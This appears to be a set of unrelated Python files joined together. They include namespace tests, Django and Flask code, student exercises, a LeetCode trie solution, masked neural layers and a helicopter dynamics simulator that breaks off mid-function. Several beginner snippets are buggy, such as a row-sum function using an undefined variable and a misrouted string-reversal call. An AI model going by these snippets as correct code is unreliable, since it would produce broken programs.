assert ns.as_flat() == argparse.Namespace(pop=2)
del ns["pop"]
assert ns == Namespace()
assert namespace_to_dict(Namespace(update=3)) == {"update": 3}
def test_leaf_clashing_keys():
ns = Namespace()
ns["x.get"] = 1
assert "x.get" in ns
assert ns.get("x.get") == 1
assert ns["x.get"] == 1
assert ns["x"]["get"] == 1
assert ns.as_dict() == {"x": {"get": 1}}
assert dict(ns.items()) == {"x.get": 1}
assert str(ns.as_flat()) == "Namespace(**{'x.get': 1})"
assert ns.pop("x.get") == 1
assert ns.get("x.get") is None
def test_shallow_branch_clashing_keys():
ns = Namespace(get=Namespace(x=2))
assert "get.x" in ns
assert ns.get("get.x") == 2
assert ns["get.x"] == 2
assert ns["get"] == Namespace(x=2)
assert ns.as_dict() == {"get": {"x": 2}}
assert dict(ns.items()) == {"get.x": 2}
assert ns.pop("get.x") == 2
def test_nested_branch_clashing_keys():
ns = Namespace()
ns["x.get.y"] = 3
assert "x.get.y" in ns
assert ns.get("x.get.y") == 3
assert ns.as_dict() == {"x": {"get": {"y": 3}}}
assert ns.pop("x.get.y") == 3
@pytest.mark.parametrize("meta_key", meta_keys)
def test_add_argument_meta_key_error(meta_key, parser):
with pytest.raises(ValueError) as ctx:
parser.add_argument(meta_key)
ctx.match(f'"{meta_key}" not allowed')
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from students.utils import format_records
from teachers.models import Teacher
from webargs import fields
from webargs.djangoparser import use_args
# Create your views here.
@use_args({
"first_name": fields.Str(
required=False
),
"last_name": fields.Str(
required=False
)},
location="query"
)
def get_teachers(request, args):
teachers = Teacher.objects.all()
for param_name, param_value in args.items():
teachers = teachers.filter(**{param_name: param_value})
records = format_records(teachers)
return HttpResponse(records) |
# name: Stephen Wang
# date: November 7, 2020
# purpose: City class
class City:
def __init__(self, code, name, region, population, latitude, longtitude):
self.code = code
self.name = name
self.region = region
self.population = int(population)
self.latitude = float(latitude)
self.longtitude = float(longtitude)
def __str__(self):
return self.name + "," + str(self.population) + "," + str(self.latitude) + "," + str(self.longtitude)
|
# -*- coding: utf-8 -*-
import time
all_st = time.time()
# import Env
import os, sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../")
from env import Env
Env()
from convert_datetime import *
from aggregate import *
from get_start_end_sta import get_start_end_mod
from pymongo import *
client = MongoClient()
db = client.nm4bd
# input:iso datetime
def analyze_mod(st_dt, ed_dt):
"""
解析処理の開始・終了時刻を管理
@param st_dt : datetime
@param ed_dt : datetime
"""
# 高速化のためのindex
db.trtmp.create_index([("get_time_no", ASCENDING)])
tmp_st = st_dt # for debug
while(tmp_st <= ed_dt):
# loop_st = time.time()
after_5s = shift_seconds(tmp_st, 5)
### execute following all process ###
aggregate_mod(tmp_st, after_5s)
get_start_end_mod(tmp_st)
tmp_st = after_5s
#####################################
# print(time.time()-loop_st)
# PR取得をせず、ローカルで解析のみを行う場合mainで実行
# python analyze.py 20170123012345 20170123123456
if __name__ == "__main__":
param = sys.argv
st_dt = dt_from_14digits_to_iso(str(param[1]))
ed_dt = dt_from_14digits_to_iso(str(param[2]))
analyze_mod(st_dt, ed_dt)
print("total:"+str(time.time()-all_st))
|
#program2a
def find(lis,key):
for i in lis:
if(i==key):
print("key found")
return True
print("key not found")
return False
lis=[1,2,3,4,5]
key=int(input("enter the key value"))
value=find(lis,key)
print(value)
#program 2b
def str1(sentence):
list1=(sentence.split(" "))
new=""
for i in list1[::-1]:
new=new+" "+i
print(new)
sentence=input("enter the string")
str1(sentence)
def str2(sentence):
list1=sentence.split(" ")
word=[word1[::-1] for word1 in list1]
sent=" ".join(word)
print(sent)
sentence=str(input("enter the string"))
str1(sentence)
|
# Generated by Django 3.0.3 on 2020-04-07 22:57
import dancingcubeapp.validators
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('dancingcubeapp', '0007_auto_20200402_1520'),
]
operations = [
migrations.AddField(
model_name='map',
name='likes',
field=models.ManyToManyField(blank=True, related_name='likes', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='map',
name='image',
field=models.ImageField(blank=True, null=True, upload_to='media\\images\\', validators=[dancingcubeapp.validators.validate_file_extension_for_image]),
),
migrations.AlterField(
model_name='map',
name='map',
field=models.FileField(upload_to='media\\maps\\', validators=[dancingcubeapp.validators.validate_file_extension_for_map]),
),
migrations.AlterField(
model_name='map',
name='music',
field=models.FileField(upload_to='media\\musics\\', validators=[dancingcubeapp.validators.validate_file_extension_for_music]),
),
]
|
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import Required, Optional
class Simulate(FlaskForm):
data = StringField('Input reference list: ', validators=[Required()])
cache_0 = StringField('', validators=[Optional()])
cache_1 = StringField('', validators=[Optional()])
cache_2 = StringField('', validators=[Optional()])
cache_3 = StringField('', validators=[Optional()])
tlb0page = StringField('', validators=[Optional()])
tlb0offset = StringField('', validators=[Optional()])
tlb1page = StringField('', validators=[Optional()])
tlb1offset = StringField('', validators=[Optional()])
frame0 = StringField('', validators=[Optional()])
frame1 = StringField('', validators=[Optional()])
frame2 = StringField('', validators=[Optional()])
frame3 = StringField('', validators=[Optional()])
frame4 = StringField('', validators=[Optional()])
frame5 = StringField('', validators=[Optional()])
frame6 = StringField('', validators=[Optional()])
frame7 = StringField('', validators=[Optional()])
page0frm = StringField('', validators=[Optional()])
page1frm = StringField('', validators=[Optional()])
page2frm = StringField('', validators=[Optional()])
page3frm = StringField('', validators=[Optional()])
page4frm = StringField('', validators=[Optional()])
page5frm = StringField('', validators=[Optional()])
page6frm = StringField('', validators=[Optional()])
page7frm = StringField('', validators=[Optional()])
|
#
# @lc app=leetcode.cn id=212 lang=python3
#
# [212] 单词搜索 II
#
# @lc code=start
class Solution:
def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:
# 1.words遍历--> board search O(N*m*m*4^k) 单词个数,矩阵行列,四连通深搜 每个单词平均长度
# 2.trie a.all words --> 构建trie 使prefix可以高效查询
# b.board,dfs 遍历每一个字符,从起点开始dfs,dfs产生任何的字符串到words中查找,看是不是它的prefix,如果是并且最后存在就输出;否则不输出
trie = {} # 1.构造字典树 O(Nk)
for word in words: # N
node = trie
for char in word: # k
node = node.setdefault(char, {})
node['#'] = True
def dfs(i, j, node, pre, visited): # (i,j)当前坐标,node当前trie树结点,pre前面的字符串,visited已访问坐标
if '#' in node: # 已有字典树结束
res.add(pre) # 添加答案
for (di, dj) in ((-1, 0), (1, 0), (0, -1), (0, 1)):
r, c = i+di, j+dj
if -1 < r < h and -1 < c < w and board[r][c] in node and (r, c) not in visited: # 可继续搜索
dfs(r, c, node[board[r][c]], pre+board[r][c], visited | {(r, c)}) # 2.dfs搜索
res, h, w = set(), len(board), len(board[0])
for i in range(h): # 3.遍历board
for j in range(w):
if board[i][j] in trie: # 可继续搜索
dfs(i, j, trie[board[i][j]], board[i][j], {(i, j)}) # dfs搜索 !!!
return list(res)
# @lc code=end
|
"""
Module containing layers for MADE model
"""
import torch
from torch import nn as nn
from torch.distributions import Uniform
from torch.nn import functional as F
class MaskedLinear(nn.Linear):
"""
Masked linear layer implemented by multiplying the layer's weights with a binary mask
"""
def __init__(self, in_features, out_features, mask, bias=True):
super().__init__(in_features, out_features, bias)
self.register_buffer('mask', torch.ones(out_features, in_features))
self.mask.data.copy_(mask.T)
def forward(self, x):
return F.linear(x, self.mask * self.weight, self.bias)
def create_masks(D, num_classes, h_layers, one_hot_input):
"""
Create masks as specified in
:param int D: size of input in each dimension
:param int num_classes: number of possible discrete values
:param list(int) h_layers: number of neurons in each hidden layer
:param one_hot_input:
:return:
"""
L = len(h_layers)
m = dict()
# sample the order of the inputs and the connectivity of all neurons
m[-1] = torch.arange(D)
for layer in range(L):
m[layer] = Uniform(low=m[layer - 1].min().item(), high=D - 1).sample((h_layers[layer],))
# construct the mask matrices
masks = [(m[layer - 1].unsqueeze(1) <= m[layer].unsqueeze(0)) for layer in range(L)]
masks.append((m[L - 1].unsqueeze(1) < m[-1].unsqueeze(0)))
# ensure output is repeated for each possible class value
masks[-1] = torch.repeat_interleave(masks[-1], num_classes, dim=1)
if one_hot_input:
# ensure input is repeated for each possible class value
masks[0] = torch.repeat_interleave(masks[0], num_classes, dim=0)
return masks
|
# Type your code here
def row_sum(list2d):
sam_list = []
for i in list2d:
sam = 0
for x in i:
sum = sum + x
sam_list.append(sam)
return sam_list |
'''
Escreva um programa que leia a velocidade de um carro.
Se ele ultrapassar 80km/h, mostre uma mensagem dizendo que ele foi multado.
A multa vai custar R$7,00 por cada km acima do limite.
'''
velocidade = float(input('Digite a velocidade do carro: '))
if velocidade < 0:
print('Valor Inválido!')
else:
if velocidade > 80.00:
print(f'Você foi multado por ultrapassar o limite de 80km/h')
multa = (velocidade - 80.00)*7.00
print(f'Sua multa é de R${multa:.2f}')
print('Você está dentro do limite de 80km/k!') |
import sys, math
import numpy as np
import os
import copy
import imageio
import time
from .kinematic import euler_to_rotmat, pqr_to_eulerdot_mat
from .dynamics import DynamicSystem, State
from .utils import pi_bound, cross_product
from .lookup import LookUpTable
FTS2KNOT = 0.5924838 # ft/s to knots conversion
EPS = 1e-4 # small value for divison by zero
R2D = 180/math.pi # Rad to deg
D2R = 1/R2D
FT2MTR = 0.3048 # ft to meter
FLOAT_TYPE = np.float
class HelicopterDynamics(DynamicSystem):
_observations = ["POWER", "LON_AIR_SPD", "LAT_AIR_SPD", "DWN_AIR_SPD", "N_VEL", "E_VEL", "DES_RATE",
"ROLL", "PITCH", "YAW", "ROLL_RATE", "PITCH_RATE", "YAW_RATE",
"N_POS", "E_POS", "ALTITUDE", "GROUND_ALTITUDE"]
n_obs = len(_observations)#int(17)
n_act = int(4)
def __init__(self, params, dt):
super(HelicopterDynamics, self).__init__(dt)
self.HELI = params['HELI']
self.ENV = params['ENV']
# Null state dots, since it is not updated.
self.__precalculations()
self.set_wind() # wind velocity in earth frame:
self.__register_states()
self.init_state = self.state
self.init_state_dots = self.state_dots
hmap_img = imageio.imread(os.environ['HELIGYM_RESOURCE_DIR'] + self.ENV["HMAP_PATH"])
hmap_img = hmap_img/np.iinfo(hmap_img.dtype).max
normal_img = imageio.imread(os.environ['HELIGYM_RESOURCE_DIR'] + self.ENV["NMAP_PATH"])
normal_img = normal_img/np.iinfo(normal_img.dtype).max
self.terrain_hmap = hmap_img*self.ENV["MAX_GR_ALT"]
self.terrain_normal = normal_img/np.sqrt((normal_img**2+EPS).sum(axis=-1, keepdims=True))
self.default_trim_cond = {
"yaw": 0.0,
"yaw_rate": 0.0,
"ned_vel": [0.0, 0.0, 0.0],
"gr_alt": 100.0,
"xy": [0.0, 0.0],
"psi_mr": 0.0,
"psi_tr": 0.0
}
def __register_states(self):
self._register_state('vi_mr', np.zeros(1, dtype=np.float))
self._register_state('vi_tr', np.zeros(1, dtype=np.float))
self._register_state('psi_mr', np.zeros(1, dtype=np.float))
self._register_state('psi_tr', np.zeros(1, dtype=np.float))
self._register_state('betas', np.zeros(2, dtype=np.float))
self._register_state('uvw', np.zeros(3, dtype=np.float))
self._register_state('pqr', np.zeros(3, dtype=np.float))
self._register_state('euler', np.zeros(3, dtype=np.float))
self._register_state('xyz', np.zeros(3, dtype=np.float))
def reset(self, trim_cond={}):
self.state = self.init_state
self.state_dots = self.init_state_dots
input_trim_cond = copy.deepcopy(self.default_trim_cond)
input_trim_cond.update(trim_cond)
self.trim(input_trim_cond)
def step_end(self):
self.state['psi_mr'] = pi_bound(self.state['psi_mr'])
self.state['psi_tr'] = pi_bound(self.state['psi_tr'])
self.state['betas'] = pi_bound(self.state['betas'])
self.state['euler'] = pi_bound(self.state['euler'])
@property
def MR(self):
return self.HELI['MR']
@property
def TR(self):
return self.HELI['TR']
@property
def FUS(self):
return self.HELI['FUS']
@property
def HT(self):
return self.HELI['HT']
@property
def VT(self):
return self.HELI['VT']
@property
def WN(self):
return self.HELI['WN']
def __precalculations(self):
# Component positions wrt CG locations
# 1/12 comes from inch to feet conversion
self.MR['H'] = (self.MR['WL']-self.HELI['WL_CG'])/12 # [ft]
self.MR['D'] = (self.MR['FS']-self.HELI['FS_CG'])/12
self.FUS['H'] = (self.FUS['WL']-self.HELI['WL_CG'])/12
self.FUS['D'] = (self.FUS['FS']-self.HELI['FS_CG'])/12
self.WN['H'] = (self.WN['WL']-self.HELI['WL_CG'])/12
self.WN['D'] = (self.WN['FS']-self.HELI['FS_CG'])/12
self.HT['H'] = (self.HT['WL']-self.HELI['WL_CG'])/12
self.HT['D'] = (self.HT['FS']-self.HELI['FS_CG'])/12
self.VT['H'] = (self.VT['WL']-self.HELI['WL_CG'])/12
self.VT['D'] = (self.VT['FS']-self.HELI['FS_CG'])/12
self.TR['H'] = (self.TR['WL']-self.HELI['WL_CG'])/12
self.TR['D'] = (self.TR['FS']-self.HELI['FS_CG'])/12
#
self.HELI['M']=self.HELI['WT']/self.ENV['GRAV'] # [slug] vehicle mass
# Main Rotor precalculations
self.MR['OMEGA'] = self.MR['RPM']*2*math.pi/60 # [rad/s] MR rev speed
self.MR['V_TIP'] = self.MR['R']*self.MR['OMEGA'] # [ft/s] MR tip speed
self.MR['FR'] = self.MR['CD0']*self.MR['R']*self.MR['B']*self.MR['C'] # eff.frontal area MR
self.MR['SOL'] = self.MR['B']*self.MR['C']/(self.MR['R']*math.pi) # MR solidity (SIGMA)
self.MR['A_SIGMA'] = self.MR['A']*self.MR['SOL'] # product(lift-curve-slope & solidity)
self.MR['GAM_OM16_DRO'] = self.MR['A']*self.MR['C']*self.MR['R']**4/self.MR['IB']* \
self.MR['OMEGA']/16*(1+8/3*self.MR['E']/self.MR['R']) # one sixth the product(lock# and rotor ang.rate), divided by air density
# primary(direct)flapping stiffness [rad/sec2]
self.MR['DL_DB1'] = self.MR['B']/2* \
(1.5*self.MR['IB']*self.MR['E']/self.MR['R']*self.MR['OMEGA']**2)
# cross(off-axis)flapping stiffness [rad/sec2], divided by air density
self.MR['DL_DA1_DRO'] = 0.5*self.MR['A']*self.MR['B']*self.MR['C']*self.MR['R']*self.MR['V_TIP']**2*self.MR['E']/6
self.MR['COEF_TH'] = 0.25*self.MR['V_TIP']*self.MR['R']*self.MR['A']*self.MR['B']*self.MR['C'] # coefficient for thrust calculation
# Tail Rotor precalculations
self.TR['OMEGA'] = self.TR['RPM']*2*math.pi/60 # [rad/s] TR rev speed
self.TR['FR'] = self.TR['CD0']*self.TR['R']*self.TR['B']*self.TR['C'] # eff.frontal area TR
self.TR['V_TIP'] = self.TR['R']*self.TR['OMEGA'] # [ft/s] TR tip speed
self.TR['SOL'] = self.TR['B']*self.TR['C']/(self.TR['R']*math.pi) # TR solidity (SIGMA)
self.TR['COEF_TH'] = 0.25*self.TR['V_TIP']*self.TR['R']*self.TR['A']*self.TR['B']*self.TR['C'] # coefficient for thrust calculation
# Inertia
#print(self.HELI['IX'])
self.HELI['I'] = np.array([ [self.HELI['IX'] , 0.0 , -self.HELI['IXZ']],
[0.0 , self.HELI['IY'] , 0.0 ],
[-self.HELI['IXZ'] , 0.0 , self.HELI['IZ'] ] ], dtype=np.float)
self.HELI['IINV'] = np.linalg.inv(self.HELI['I'])
def set_wind(self, wind_ned: np.ndarray = np.zeros(3, np.float)):
# wind velocity in earth frame:
self.WIND_NED = wind_ned
def _altitude_to_air_properties(self, altitude):
"""Calculate Air temperature and density from altitude.
"""
temp = self.ENV['T0'] - self.ENV['LAPSE']*altitude # [R] Temperature at the current altitude
rho = self.ENV['RO_SEA']*(temp/self.ENV['T0'])**((self.ENV['GRAV']/(self.ENV['LAPSE']*self.ENV['R']))-1.0) # [slug/ft**3]
return temp, rho
def __get_ground_height_from_hmap(self):
x_ = self.ENV["NS_MAX"] / self.terrain_hmap.shape[0] # terrain x size per pixel
y_ = self.ENV["EW_MAX"] / self.terrain_hmap.shape[1] # terrain y size per pixel
x_loc = (self.state['xyz'][0]) / x_ + self.terrain_hmap.shape[0] // 2
y_loc = (self.state['xyz'][1]) / y_ + self.terrain_hmap.shape[1] // 2
# make sure that get height from hmap
if x_loc < 0:
x_loc = 0
elif x_loc > self.terrain_hmap.shape[0] - 1:
x_loc = self.terrain_hmap.shape[0] - 1
if y_loc < 0:
y_loc = 0
elif y_loc > self.terrain_hmap.shape[0] - 1:
y_loc = self.terrain_hmap.shape[0] - 1
x_ind = math.floor(x_loc)
y_ind = math.floor(y_loc)
middle = self.terrain_hmap[y_ind, x_ind]
if x_ind == self.terrain_hmap.shape[0] - 1 : x_ind = self.terrain_hmap.shape[0] - 2
if y_ind == self.terrain_hmap.shape[1] - 1 : y_ind = self.terrain_hmap.shape[1] - 2
north = self.terrain_hmap[y_ind, x_ind + 1]
east = self.terrain_hmap[y_ind + 1, x_ind]
height = middle + (north - middle) * (x_loc - x_ind) + (east - middle) * (y_loc - y_ind)
return height
def _does_hit_ground(self, altitude):
return altitude - self.ground_touching_altitude() < 0.0
def ground_touching_altitude(self):
return self.__get_ground_height_from_hmap() + self.HELI['WL_CG']/12 # divide by 12 to make inch to feet
def _calc_mr_fm(self, rho, coll, lon, lat, betas, uvw_air, pqr, vi_mr, psi_mr):
"""Calculate Forces and Moments caused by Main Rotor
ans Main Rotor Dynamics
"""
### Calculate required parameters first.
# one sixth the product(lock# and rotor ang.rate)
GAM_OM16 = rho*self.MR['GAM_OM16_DRO']
# flapping aero cpl(flapping coupling factor)
KC = (0.75*self.MR['OMEGA']*self.MR['E']/self.MR['R']/GAM_OM16)+self.MR['K1']
# flapping x-cpl coef
ITB2_OM = self.MR['OMEGA']/(1+(self.MR['OMEGA']/GAM_OM16)**2)
# flapping primary resp(inverse TPP lag) [rad/s]
ITB = ITB2_OM*self.MR['OMEGA']/GAM_OM16
# primary(direct)flapping stiffness [rad/sec2]
DL_DB1 = self.MR['DL_DB1']
# cross(off-axis)flapping stiffness [rad/sec2]
DL_DA1 = rho*self.MR['DL_DA1_DRO']
## MR Force Moments and inflow dynamics.
v_adv_2 = uvw_air[0]*uvw_air[0]+uvw_air[1]*uvw_air[1]
wr = uvw_air[2] + (betas[0]-self.MR['IS'])*uvw_air[0] - betas[1]*uvw_air[1] # z-axis vel re rotor plane
wb = wr + 0.66667*self.MR['V_TIP']*(coll+0.75*self.MR['TWST']) + \
v_adv_2/self.MR['V_TIP']*(coll+0.5*self.MR['TWST']) # z-axis vel re blade (equivalent)
thrust_mr = (wb - vi_mr[0]) * rho*self.MR['COEF_TH']
vi_mr_dot = np.zeros(1, dtype=np.float)
vi_mr_dot[0] = 0.75*math.pi/self.MR['R']*(thrust_mr/(2*math.pi*rho*self.MR['R']*self.MR['R']) - vi_mr[0]*math.sqrt(v_adv_2+(wr-vi_mr[0])**2))
# MR induced flow power consumption
induced_power = thrust_mr*(vi_mr[0]-wr)
# MR profile drag power consumption
profile_power = 0.5*rho*(self.MR['FR']/4)*self.MR['V_TIP']*(self.MR['V_TIP']*self.MR['V_TIP']+ \
3.0*v_adv_2)
power_mr = induced_power+profile_power
torque_mr = power_mr/self.MR['OMEGA']
# thrust coeff.
CT = thrust_mr/(rho*math.pi*self.MR['R']*self.MR['R']*self.MR['V_TIP']*self.MR['V_TIP'])
CT = max([CT, 0.0])
## Dihedral effect on TPP
# TPP dihedral effect(late.flap2side vel)
DB1DV = 2/self.MR['V_TIP']*(8*CT/self.MR['A_SIGMA']+(math.sqrt(0.5*CT)))
DA1DU = -DB1DV # TPP pitchup with speed
### MR TPP Dynamics
#wake_fn = 0.5 + 0.5*np.tanh(10*(np.abs(uvw_air[0])/self.HELI['VTRANS']-1.0))
wake_fn = 1.0 if (math.fabs(uvw_air[0]) > self.HELI['VTRANS']) else 0.0
a_sum = betas[1]-lat+KC*betas[0]+DB1DV*uvw_air[1]*(1+wake_fn)
b_sum = betas[0]+lon-KC*betas[1]+DA1DU*uvw_air[0]*(1+2*wake_fn)
betas_dot = np.zeros(2, dtype=np.float)
betas_dot[0] = -ITB*b_sum-ITB2_OM*a_sum-pqr[1]
betas_dot[1] = -ITB*a_sum+ITB2_OM*b_sum-pqr[0]
### Transmission dynamics of MR
psi_mr_dot = np.zeros(1, dtype=np.float)
psi_mr_dot[0] = self.MR['OMEGA']
### Compute main rotor force and moment components
X_MR=-thrust_mr*(betas[0]-self.MR['IS'])
Y_MR=thrust_mr*betas[1]
Z_MR=-thrust_mr
L_MR=Y_MR*self.MR['H']+DL_DB1*betas[1]+DL_DA1*(betas[0]+lon-self.MR['K1']*betas[1])
M_MR=Z_MR*self.MR['D']-X_MR*self.MR['H']+DL_DB1*betas[0]+DL_DA1*(-betas[1]+lat-self.MR['K1']*betas[0])
N_MR=torque_mr
force_mr = np.array([X_MR,Y_MR,Z_MR], dtype=np.float)
moment_mr = np.array([L_MR, M_MR, N_MR], dtype=np.float)
return force_mr, moment_mr, power_mr, betas_dot, vi_mr_dot, psi_mr_dot
def _calc_tr_fm(self, rho, pedal, uvw_air, pqr, vi_tr, psi_tr):
"""Calculate Forces and Moments caused by Tail Rotor
"""
## TR Force Moments and inflow dynamics.
v_adv_2 = (uvw_air[2]+pqr[1]*self.TR['D'])**2 + uvw_air[0]**2
vr = -(uvw_air[1] - pqr[2]*self.TR['D'] + pqr[0]*self.TR['H']) # vel re rotor plane
vb = vr + 0.66667*self.TR['V_TIP']*(pedal+0.75*self.TR['TWST']) + \
v_adv_2/self.TR['V_TIP']*(pedal+0.5*self.TR['TWST'])# vel re blade plane (equivalent)
thrust_tr = (vb - vi_tr[0])*rho*self.TR['COEF_TH']
vi_tr_dot = np.zeros(1, dtype=np.float)
vi_tr_dot[0] = 0.75*math.pi/self.TR['R']*(thrust_tr/(2*math.pi*rho*self.TR['R']**2) - vi_tr[0]*math.sqrt(v_adv_2+(vr-vi_tr[0])**2))
vi_tr_dot[0] *= 0.5 # slow down inflow dynamics due to numerical unstability.
### Transmission dynamics of TR
psi_tr_dot = np.zeros(1, dtype=np.float)
psi_tr_dot[0] = self.TR['OMEGA']
power_tr = thrust_tr*(vi_tr[0]-vr)
# torque=power_tr/self.TR['OMEGA'];
### Compute tail rotor force and moment components
Y_TR=thrust_tr
L_TR=Y_TR*self.TR['H']
N_TR=-Y_TR*self.TR['D']
force_tr = np.array([0,Y_TR,0], dtype=np.float)
moment_tr = np.array([L_TR, 0, N_TR], dtype=np.float)
return force_tr, moment_tr, power_tr, vi_tr_dot, psi_tr_dot
def _calc_fus_fm(self, rho, uvw_air, vi_mr):
"""Calculate Forces and Moments caused by Fuselage
"""
wa_fus = uvw_air[2]-vi_mr[0] # Include rotor downwash on fuselage
wa_fus += (wa_fus>0)*EPS # Make it nonzero!
d_fw=(uvw_air[0]/(-wa_fus)*(self.MR['H']-self.FUS['H']))-(self.FUS['D']-self.MR['D']) # Pos of downwash on fuselage
d_fw *= self.FUS['COR'] #emprical correction
rho_half = 0.5*rho
X_FUS = rho_half*self.FUS['XUU']*math.fabs(uvw_air[0])*uvw_air[0]
Y_FUS = rho_half*self.FUS['YVV']*math.fabs(uvw_air[1])*uvw_air[1]
Z_FUS = rho_half*self.FUS['ZWW']*math.fabs(wa_fus)*wa_fus
L_FUS = Y_FUS*self.FUS['H']
M_FUS = Z_FUS*d_fw-X_FUS*self.FUS['H']
# Fuselage power consumption
power_parasite=-X_FUS*uvw_air[0]-Y_FUS*uvw_air[1]-Z_FUS*wa_fus
power_fus=power_parasite
force_fus = np.array([X_FUS,Y_FUS,Z_FUS], dtype=np.float)
moment_fus = np.array([L_FUS, M_FUS, 0], dtype=np.float)
return force_fus, moment_fus, power_fus
def _calc_ht_fm(self, rho, uvw_air, pqr, vi_mr):
"""Calculate Forces and Moments caused by Horizontal Tail
"""
# downwash impinges on tail?
v_dw = max([vi_mr[0]-uvw_air[2], EPS])
d_dw=(uvw_air[0]/v_dw*(self.MR['H']-self.HT['H'])) \
- (self.HT['D']-self.MR['D']-self.MR['R'])
if d_dw >0 and d_dw<self.MR['R']: #Triangular downwash
eps_ht=2*(1-d_dw/self.MR['R'])
else:
eps_ht=0
wa_ht = uvw_air[2]-eps_ht*vi_mr[0]+self.HT['D']*pqr[1] # local z-vel at h.t
if math.fabs(wa_ht) > 0.3*math.fabs(uvw_air[0]): # surface stalled ?
vta_ht = math.sqrt(uvw_air[0]**2+uvw_air[1]**2+wa_ht**2) #
Z_HT=0.5*rho*self.HT['ZMAX']*math.fabs(vta_ht)*wa_ht # circulation
else:
Z_HT=0.5*rho*(self.HT['ZUU']*math.fabs(uvw_air[0])*uvw_air[0]+self.HT['ZUW']*math.fabs(uvw_air[0])*wa_ht) # circulation
M_HT = Z_HT*self.HT['D'] # pitching moment
force_ht = np.array([0,0,Z_HT], dtype=np.float)
moment_ht = np.array([0, M_HT, 0], dtype=np.float)
return force_ht, moment_ht
def _calc_vt_fm(self, rho, uvw_air, pqr, vi_tr):
"""Calculate Forces and Moments caused by Vertical Tail
"""
va_vt=uvw_air[1]+vi_tr[0]-self.VT['D']*pqr[2]
if math.fabs(va_vt) > 0.3*math.fabs(uvw_air[0]):
vta_vt=math.sqrt(uvw_air[0]**2+va_vt**2)
Y_VT=0.5*rho*self.VT['YMAX']*math.fabs(vta_vt)*va_vt
else:
Y_VT=0.5*rho*(self.VT['YUU']*math.fabs(uvw_air[0])*uvw_air[0]+self.VT['YUV']*math.fabs(uvw_air[0])*va_vt)
L_VT=Y_VT*self.VT['H']
N_VT=-Y_VT*self.VT['D']
force_vt = np.array([0,Y_VT,0], dtype=np.float)
moment_vt = np.array([L_VT, 0, N_VT], dtype=np.float)
return force_vt, moment_vt
def _calc_wn_fm(self, rho, uvw_air, vi_mr):
"""Calculate Forces and Moments caused by Wing
"""
## Wing
if self.WN["ZUW"]==0.0:
X_WN, Z_WN = 0.0, 0.0
else:
wa_wn= uvw_air[2]-vi_mr[0] # local z-vel at wing
vta_wn=math.sqrt(uvw_air[0]*uvw_air[0]+wa_wn*wa_wn)
if math.fabs(wa_wn) > 0.3*math.fabs(uvw_air[0]): # surface stalled ?
Z_WN=0.5*rho*self.WN['ZMAX']*math.fabs(vta_wn)*wa_wn
else:
Z_WN=0.5*rho*(self.WN['ZUU']*uvw_air[0]**2+self.WN['ZUW']*uvw_air[0]*wa_wn)
X_WN=-0.5*rho/math.pi/vta_wn**2*(self.WN['ZUU']*uvw_air[0]*uvw_air[0]+self.WN['ZUW']*uvw_air[0]*wa_wn)**2 # ? induced drag
power_wn=math.fabs(X_WN*uvw_air[0]) # wing power
force_wn = np.array([X_WN,0,Z_WN], dtype=np.float)
moment_wn = np.array([0, 0, 0], dtype=np.float)
return force_wn, moment_wn, power_wn
def dynamics(self, state, action, set_observation=False):
#
state_dots = copy.deepcopy(self.state_dots)
#
vi_mr = state['vi_mr']
vi_tr = state['vi_tr']
psi_mr = state['psi_mr']
psi_tr = state['psi_tr']
betas = state['betas']
uvw = state['uvw']
pqr = state['pqr']
euler = state['euler']
xyz = state['xyz']
### Control input calculations
coll = D2R*( self.HELI['COL_OS'] +
0.5*action[0]*(self.HELI['COL_H'] - self.HELI['COL_L']) +
0.5*(self.HELI['COL_H'] + self.HELI['COL_L']) )
lon = D2R*( 0.5*action[1]*(self.HELI['LON_H'] - self.HELI['LON_L']) +
0.5*(self.HELI['LON_H'] + self.HELI['LON_L']) )
lat = D2R*( 0.5*action[2]*(self.HELI['LAT_H'] - self.HELI['LAT_L']) +
0.5*(self.HELI['LAT_H'] + self.HELI['LAT_L']) )
pedal = D2R*( self.HELI['PED_OS'] + 0.5*action[3]*(self.HELI['PED_H'] - self.HELI['PED_L']) +
0.5*(self.HELI['PED_H'] + self.HELI['PED_L']) )
### Kinematic calculations
earth2body = euler_to_rotmat(euler) # Earth to Body DCM matrix
body2earth = earth2body.transpose() # Body to Earth DCM matrix
pqr_to_eulerdot = pqr_to_eulerdot_mat(euler) # par to eulerdot function.
euler_dot = pqr_to_eulerdot@pqr # calculated eulerdot..
ned_vel = body2earth@uvw # ned velocity
### Airspeed calculations
uvw_air = uvw - earth2body@self.WIND_NED
#### Some Observations ####
power_climb = self.HELI['WT']*(-ned_vel[2]) # Climbing power [hp]
### Atmosphere calculations
temperature, rho = self._altitude_to_air_properties(-xyz[2])
### Main Rotor
force_mr, moment_mr, power_mr, betas_dot, vi_mr_dot, psi_mr_dot = self._calc_mr_fm(rho, coll, lon, lat, betas, uvw_air, pqr, vi_mr, psi_mr)
force_tr, moment_tr, power_tr, vi_tr_dot, psi_tr_dot = self._calc_tr_fm(rho, pedal, uvw_air, pqr, vi_tr, psi_tr)
force_fus, moment_fus, power_fus = self._calc_fus_fm(rho, uvw_air, vi_mr)
force_ht, moment_ht = self._calc_ht_fm(rho, uvw_air, pqr, vi_mr)
force_vt, moment_vt = self._calc_vt_fm(rho, uvw_air, pqr, vi_tr)
force_wn, moment_wn, power_wn = self._calc_wn_fm(rho, uvw_air, vi_mr)
# Other power consumptions are counted for main rotor torque
power_extra_mr = power_climb + power_fus
extra_mr_torque = power_extra_mr / self.MR['OMEGA']
moment_mr[2] += extra_mr_torque
power_total = power_mr + power_tr + power_extra_mr + power_wn + 550*self.HELI['HP_LOSS']
force_gravity = earth2body@np.array([0,0,self.HELI['WT']])
force_total = force_mr + force_tr + force_fus + force_ht + force_vt + force_wn + force_gravity
moment_total = moment_mr + moment_tr + moment_fus + moment_ht + moment_vt + moment_wn
if self._does_hit_ground(-xyz[2]):
w = 5.0
zeta = 2.0
K = w*w * self.HELI["M"]
C = 2 * zeta * self.HELI["M"] * w
cxdot = C * ned_vel[2]
kx = K * (xyz[2] + self.ground_touching_altitude())
force_ground = earth2body@ np.array([0.0, 0.0, -(cxdot + kx) + EPS])
force_total += force_ground
body_acc = force_total/self.HELI['M']
